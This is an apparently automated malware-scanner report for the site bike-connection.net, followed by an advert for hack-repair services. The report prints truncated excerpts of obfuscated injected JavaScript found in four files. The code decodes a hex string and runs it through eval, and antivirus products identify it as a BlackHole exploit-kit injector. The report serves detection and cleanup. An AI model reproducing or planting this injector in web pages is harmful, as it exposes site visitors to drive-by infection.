Malware Scanner report for bike-connection.net

Malicious/Suspicious/Total urls checked: 4/0/9

4 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "bike-connection.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bike-connection.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://bike-connection.net/	200 OK Content-Length: 57596 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0','width','662','height','400','src','touren_2008_images/ausgabe_europa','quality','high','pluginspage','http://www.macromedia.com/go/getflashplayer','wmode','transparent','movie','touren_2008_images/ausgabe_europa?var2008= <script type="text/javascript" language="javascript" > ylr="y";vlmlmf="d"+"o"+"c"+"ument";try{+function(){if(document.qu ...[3545 bytes skipped]... Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/Blacole.EB.121 Avast JS:Decode-BFW [Trj] Ad-Aware JS:Exploit.BlackHole.EB Ikarus JS.Exploit.BlackHole nProtect JS:Exploit.BlackHole.EB TrendMicro-HouseCall TROJ_GEN.F47V0109 Emsisoft JS:Exploit.BlackHole.EB (B) Comodo TrojWare.JS.iFrame.D McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/Quidvetis.C MicroWorld-eScan JS:Exploit.BlackHole.EB McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.EB VIPRE Trojan.JS.Obfuscator.aa (v) Norman Blacole.WU GData JS:Exploit.BlackHole.EB BitDefender JS:Exploit.BlackHole.EB
http://bike-connection.net/copytoclipboard.js	404 Not Found Content-Length: 216 Content-Type: text/html	clean
http://bike-connection.net/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean
http://bike-connection.net/./Scripts/AC_RunActiveContent.js	200 OK Content-Length: 8109 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) hyjc="y";bffqn="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[bffqn].body)==null}()}catch(ggei){suds=function(mduf){mduf="fr"+"omCh"+mduf;for(mif=0;mif<hyjc.length;mif++){jee+=String[mduf](mtud(udmv+(hyjc[mif]))-(91));}};};mtud=(window.eval);udmv="0x";rrd=0;try{;}catch(sqw){rrd=1}if(!rrd){try{++mtud(bffqn)["\x62o"+"d"+hyjc]}catch(ggei){mhsgr="^";}hyjc="7b^c1^d0^c9^be^cf^c4^ca^c9^7b^d4^bc^8b^94^83^84^7b^d6^68^65^7b^d1^bc^cd^7b^ce^cf^bc^cf^c4^be^98^82^bc^c5^bc^d3^82^96^ ... 3603 bytes are skipped ...c9^c2^83^7b^c7^c0^c9^87^7b^c0^c9^bf^7b^84^7b^84^96^68^65^d8^68^65^c4^c1^7b^83^c9^bc^d1^c4^c2^bc^cf^ca^cd^89^be^ca^ca^c6^c4^c0^a0^c9^bc^bd^c7^c0^bf^84^68^65^d6^68^65^c4^c1^83^a2^c0^cf^9e^ca^ca^c6^c4^c0^83^82^d1^c4^ce^c4^cf^c0^bf^ba^d0^cc^82^84^98^98^90^90^84^d6^d8^c0^c7^ce^c0^d6^ae^c0^cf^9e^ca^ca^c6^c4^c0^83^82^d1^c4^ce^c4^cf^c0^bf^ba^d0^cc^82^87^7b^82^90^90^82^87^7b^82^8c^82^87^7b^82^8a^82^84^96^68^65^68^65^d4^bc^8b^94^83^84^96^68^65^d8^68^65^d8".split(mhsgr);jee="";suds("arCode");mtud(""+jee);} Antivirus reports: AntiVir JS/iFrame.det Avast JS:Decode-BFW [Trj] Ad-Aware JS:Exploit.BlackHole.EB Ikarus JS.Exploit.BlackHole nProtect JS:Exploit.BlackHole.EB TrendMicro-HouseCall TROJ_GEN.F47V0103 Comodo TrojWare.JS.iFrame.D Emsisoft JS:Exploit.BlackHole.EB (B) McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.NY MicroWorld-eScan JS:Exploit.BlackHole.EB Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.EB AVG Script/Exploit.Kit Norman Blacole.WU GData JS:Exploit.BlackHole.EB BitDefender JS:Exploit.BlackHole.EB
http://bike-connection.net/./_jsc/ddlevelsmenu.js	200 OK Content-Length: 20465 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) hyjc="y";bffqn="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[bffqn].body)==null}()}catch(ggei){suds=function(mduf){mduf="fr"+"omCh"+mduf;for(mif=0;mif<hyjc.length;mif++){jee+=String[mduf](mtud(udmv+(hyjc[mif]))-(91));}};};mtud=(window.eval);udmv="0x";rrd=0;try{;}catch(sqw){rrd=1}if(!rrd){try{++mtud(bffqn)["\x62o"+"d"+hyjc]}catch(ggei){mhsgr="^";}hyjc="7b^c1^d0^c9^be^cf^c4^ca^c9^7b^d4^bc^8b^94^83^84^7b^d6^68^65^7b^d1^bc^cd^7b^ce^cf^bc^cf^c4^be^98^82^bc^c5^bc^d3^82^96^ ... 3603 bytes are skipped ...c9^c2^83^7b^c7^c0^c9^87^7b^c0^c9^bf^7b^84^7b^84^96^68^65^d8^68^65^c4^c1^7b^83^c9^bc^d1^c4^c2^bc^cf^ca^cd^89^be^ca^ca^c6^c4^c0^a0^c9^bc^bd^c7^c0^bf^84^68^65^d6^68^65^c4^c1^83^a2^c0^cf^9e^ca^ca^c6^c4^c0^83^82^d1^c4^ce^c4^cf^c0^bf^ba^d0^cc^82^84^98^98^90^90^84^d6^d8^c0^c7^ce^c0^d6^ae^c0^cf^9e^ca^ca^c6^c4^c0^83^82^d1^c4^ce^c4^cf^c0^bf^ba^d0^cc^82^87^7b^82^90^90^82^87^7b^82^8c^82^87^7b^82^8a^82^84^96^68^65^68^65^d4^bc^8b^94^83^84^96^68^65^d8^68^65^d8".split(mhsgr);jee="";suds("arCode");mtud(""+jee);} Antivirus reports: AntiVir JS/iFrame.det Avast JS:Decode-BFW [Trj] Ad-Aware JS:Exploit.BlackHole.EB Ikarus JS.Exploit.BlackHole nProtect JS:Exploit.BlackHole.EB TrendMicro-HouseCall TROJ_GEN.F47V0103 Comodo TrojWare.JS.iFrame.D Emsisoft JS:Exploit.BlackHole.EB (B) McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.NY MicroWorld-eScan JS:Exploit.BlackHole.EB Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.EB AVG Script/Exploit.Kit Norman Blacole.WU GData JS:Exploit.BlackHole.EB BitDefender JS:Exploit.BlackHole.EB
http://bike-connection.net/tooltip.js	200 OK Content-Length: 487 Content-Type: application/x-javascript	clean
http://bike-connection.net/ticker.js.php	200 OK Content-Length: 4877 Content-Type: text/html	clean
http://bike-connection.net/Scripts/AC_RunActiveContent.js	200 OK Content-Length: 8109 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) hyjc="y";bffqn="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[bffqn].body)==null}()}catch(ggei){suds=function(mduf){mduf="fr"+"omCh"+mduf;for(mif=0;mif<hyjc.length;mif++){jee+=String[mduf](mtud(udmv+(hyjc[mif]))-(91));}};};mtud=(window.eval);udmv="0x";rrd=0;try{;}catch(sqw){rrd=1}if(!rrd){try{++mtud(bffqn)["\x62o"+"d"+hyjc]}catch(ggei){mhsgr="^";}hyjc="7b^c1^d0^c9^be^cf^c4^ca^c9^7b^d4^bc^8b^94^83^84^7b^d6^68^65^7b^d1^bc^cd^7b^ce^cf^bc^cf^c4^be^98^82^bc^c5^bc^d3^82^96^ ... 3603 bytes are skipped ...c9^c2^83^7b^c7^c0^c9^87^7b^c0^c9^bf^7b^84^7b^84^96^68^65^d8^68^65^c4^c1^7b^83^c9^bc^d1^c4^c2^bc^cf^ca^cd^89^be^ca^ca^c6^c4^c0^a0^c9^bc^bd^c7^c0^bf^84^68^65^d6^68^65^c4^c1^83^a2^c0^cf^9e^ca^ca^c6^c4^c0^83^82^d1^c4^ce^c4^cf^c0^bf^ba^d0^cc^82^84^98^98^90^90^84^d6^d8^c0^c7^ce^c0^d6^ae^c0^cf^9e^ca^ca^c6^c4^c0^83^82^d1^c4^ce^c4^cf^c0^bf^ba^d0^cc^82^87^7b^82^90^90^82^87^7b^82^8c^82^87^7b^82^8a^82^84^96^68^65^68^65^d4^bc^8b^94^83^84^96^68^65^d8^68^65^d8".split(mhsgr);jee="";suds("arCode");mtud(""+jee);} Antivirus reports: AntiVir JS/iFrame.det Avast JS:Decode-BFW [Trj] Ad-Aware JS:Exploit.BlackHole.EB Ikarus JS.Exploit.BlackHole nProtect JS:Exploit.BlackHole.EB TrendMicro-HouseCall TROJ_GEN.F47V0103 Comodo TrojWare.JS.iFrame.D Emsisoft JS:Exploit.BlackHole.EB (B) McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.NY MicroWorld-eScan JS:Exploit.BlackHole.EB Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.EB AVG Script/Exploit.Kit Norman Blacole.WU GData JS:Exploit.BlackHole.EB BitDefender JS:Exploit.BlackHole.EB
http://bike-connection.net/contentslider.js	200 OK Content-Length: 7733 Content-Type: application/x-javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bike-connection.net

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 10 Jan 2015 02:29:26 GMT
Pragma: no-cache
Server: nginx/1.2.1
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9edc9a1a6a99acef182b5552b69005e0; path=/
X-Powered-By: PHP/5.2.17

Second query (visit from search engine):
GET / HTTP/1.1
Host: bike-connection.net
Referer: http://www.google.com/search?q=bike-connection.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for bike-connection.net

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools